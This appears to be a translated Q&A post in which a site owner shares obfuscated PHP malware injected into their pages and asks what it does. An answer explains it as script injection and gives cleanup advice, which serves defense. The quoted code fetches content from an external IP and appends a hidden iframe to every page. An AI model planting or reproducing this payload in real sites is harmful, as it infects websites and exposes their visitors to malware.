[英]Server Hack - Random Code added tot he top of PHP files
我在我的一些.PHP页面上找到了这些代码行。
<?php /*d9787ac8b1f855217686293eff4ef53cvf4cet4gsk4k00na*/if (!defined('HDDD467FFEY322')){function _shutdown_function($asd){$write =<<<AOLEW
<script type='text/javascript'>if (typeof KDDRTFGEG == 'undefined') {document.write("<iframe src='http://82.200.204.151/config.inc.php' style='position:absolute;top:-1000px;left:-1000px;text-indent:-1000;width:1px;height:1px;'></iframe>");KDDRTFGEG=true;}</script>
AOLEW;
$asd = preg_replace('/<!--d9787ac8b1f855217686293eff4ef53cvf4cet4gsk4k00na-->(.*?)<!--d9787ac8b1f855217686293eff4ef53cvf4cet4gsk4k00na-->/i', '', $asd); $sdf = file_get_contents('http://82.200.204.151/config.inc.php');return str_replace('</body>', str_replace('http://82.200.204.151/config.inc.php', $sdf, $write) . '</body>', $asd);}if (function_exists('ob_start') && is_callable('ob_start')) $result = ob_start('_shutdown_function', 0, true);define('HDDD467FFEY322', 1);}/*d9787ac8b1f855217686293eff4ef53cvf4cet4gsk4k00na*/ ?>
有人知道吗?
或者至少告诉我它在做什么...
这称为JavaScript注入( XSS 1 ),它在服务器被黑客入侵并传播感染时发生。
例如,这可能会在进入网站时提示下载窗口,从而导致误导用户在其计算机上下载可能的恶意软件。
要摆脱它,您最好检查一下所有文件,扫描整台PC,或者进行全新安装。 文件中通常包含奇怪的<script>
标记,其中包含一些非常怪异的“ make -no-sense ” JS-这很好地表明您的文件已注入JS。
如果要永久消除泄漏 (或者直到他们找到XSS站点的新方法),还需要找到泄漏。
您可以做另一件事来保护自己免受XSS攻击: CSP
1 ::跨站点脚本
自从我今天重新审视这个答案以来,在2001年9/11之后的14年,我要向那天死亡的人表示敬意-RIP
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.